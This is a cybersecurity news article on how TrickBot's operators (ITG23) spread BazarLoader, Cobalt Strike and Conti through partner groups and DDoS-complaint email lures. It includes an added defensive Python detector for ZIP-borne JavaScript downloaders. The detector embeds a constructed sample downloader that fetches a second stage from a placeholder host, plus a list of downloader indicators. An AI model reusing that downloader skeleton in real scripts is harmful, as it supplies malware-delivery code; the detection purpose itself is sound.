TrickBot's Attackers Are Expanding Their Malware Distribution Channels

The operators of the notorious TrickBot malware have returned with new tactics to widen the malware's distribution routes, with infections ultimately leading to the deployment of ransomware such as Conti.

According to a report by IBM X-Force, the threat actor tracked as ITG23 (also known as Wizard Spider) has been observed collaborating with other cybercrime groups tracked as Hive0105, Hive0106 (aka TA551 or Shathak), and Hive0107. These groups are part of a growing pool of operators that cybercriminals use to distribute their own malware.

Researchers Ole Villadsen and Charlotte Hammond state that these and other cybercrime suppliers get malware into business networks by hijacking existing email threads, by abusing fake customer response forms, and by social engineering employees through a fake call center known as BazarCall.

TrickBot has advanced from a banking trojan to a reconfigurable Windows-based crimeware solution since first appearing on the threat landscape in 2016.

It has also stood out for its resiliency, demonstrating the ability to maintain and update its toolset and infrastructure despite multiple attempts by law enforcement agencies and industry groups to take it down.

The Wizard Spider gang is also credited with the creation of BazarLoader and a backdoor known as Anchor, in addition to TrickBot.

While the group's attacks earlier this year relied on email campaigns delivering Excel documents and on the BazarCall (also written "BazaCall") call center hoax to distribute malware to businesses, intrusions observed since around June 2021 have been marked by cooperation with two additional cybercrime groups to expand its distribution infrastructure, deploying Cobalt Strike payloads via hijacked email threads and fake online customer inquiry forms on company websites.

This move raised the number of delivery attempts and broadened the range of distribution techniques, allowing the group to reach more prospective victims than before.

The Hive0107 affiliate is said to have adopted a new tactic in one infection chain. It involves sending email messages to target firms claiming that their websites have been carrying out distributed denial-of-service (DDoS) attacks against the sender's servers, together with a link to supposed proof.

When the link is clicked, a ZIP archive containing a malicious JavaScript (JS) downloader is delivered. The script contacts a remote URL to fetch the BazarLoader malware, which in turn drops Cobalt Strike and TrickBot.
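As an added example (not code from the IBM report or this article), the following Python inspects a ZIP attachment for the shape of lure described above: a Windows script file inside the archive, possibly hiding behind a decoy document extension, that carries the building blocks of a downloader. The sample archive, its file names and the placeholder URL are all constructed here for illustration; the indicator list is a generic starting point, not a signature from the report.

```python
import io
import re
import zipfile

# Script types that Windows hands to WScript/CScript or mshta on double-click.
SCRIPT_EXTENSIONS = (".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta")

# Building blocks a script downloader needs: an HTTP client, a way to write
# the fetched payload to disk, a way to launch it, and a URL to fetch from.
# Generic heuristics chosen for this example, not indicators from the report.
DOWNLOADER_INDICATORS = [
    ("xmlhttp", re.compile(r"MSXML2\.(Server)?XMLHTTP", re.I)),
    ("adodb_stream", re.compile(r"ADODB\.Stream", re.I)),
    ("wscript_shell", re.compile(r"WScript\.Shell", re.I)),
    ("filesystem_object", re.compile(r"Scripting\.FileSystemObject", re.I)),
    ("url", re.compile(r"https?://", re.I)),
]


def inspect_zip(data: bytes) -> list:
    """Return one finding per archive entry that looks like a script downloader."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = info.filename.lower()
            # Only the real (last) extension decides what Windows executes.
            if not name.endswith(SCRIPT_EXTENSIONS):
                continue
            # "proof.pdf.js": a dot left in the basename after stripping the
            # real extension means a decoy extension is in play.
            basename = name.rsplit("/", 1)[-1]
            stem = basename.rsplit(".", 1)[0]
            double_extension = "." in stem
            content = zf.read(info).decode("utf-8", errors="replace")
            hits = [label for label, rx in DOWNLOADER_INDICATORS if rx.search(content)]
            findings.append({
                "entry": info.filename,
                "double_extension": double_extension,
                "downloader_indicators": hits,
            })
    return findings


def build_sample_zip() -> bytes:
    """Constructed sample archive: a decoy-named JS downloader plus a benign file."""
    js = (
        'var x = new ActiveXObject("MSXML2.XMLHTTP");\n'
        'x.open("GET", "http://example.invalid/stage2", false);\n'  # placeholder URL
        'x.send();\n'
        'var s = new ActiveXObject("ADODB.Stream");\n'
        'var sh = new ActiveXObject("WScript.Shell");\n'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("ddos_proof.pdf.js", js)   # constructed lure name
        zf.writestr("readme.txt", "benign text file")
    return buf.getvalue()


if __name__ == "__main__":
    for finding in inspect_zip(build_sample_zip()):
        print(finding)
```

The check deliberately keys on the final extension rather than the displayed name, because Explorer hides known extensions by default and a "proof.pdf.js" entry shows up as "proof.pdf". A mail gateway rule that quarantines any archive entry with a script extension, regardless of content, is the simpler and more robust control; the content heuristics here only help triage what got through.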

The researchers concluded that ITG23 has also adapted to the ransomware economy by developing the Conti ransomware-as-a-service (RaaS) offering and using its BazarLoader and TrickBot payloads to gain the initial foothold for ransomware attacks.

This latest move shows the group's ability to leverage its ties within the cybercriminal ecosystem to increase the number of businesses infected with its malware.

About the author

CIM Team

CyberIntelMag is the trusted authority in cybersecurity, comprised of leading industry experts for over 20 years, dedicated to serving cybersecurity professionals. Our goal is to provide a one-stop shop for knowledge and insight needed to navigate throughout today’s emerging cybersecurity landscape through in-depth coverage of breaking news, tutorials, product reviews, videos and industry influencers.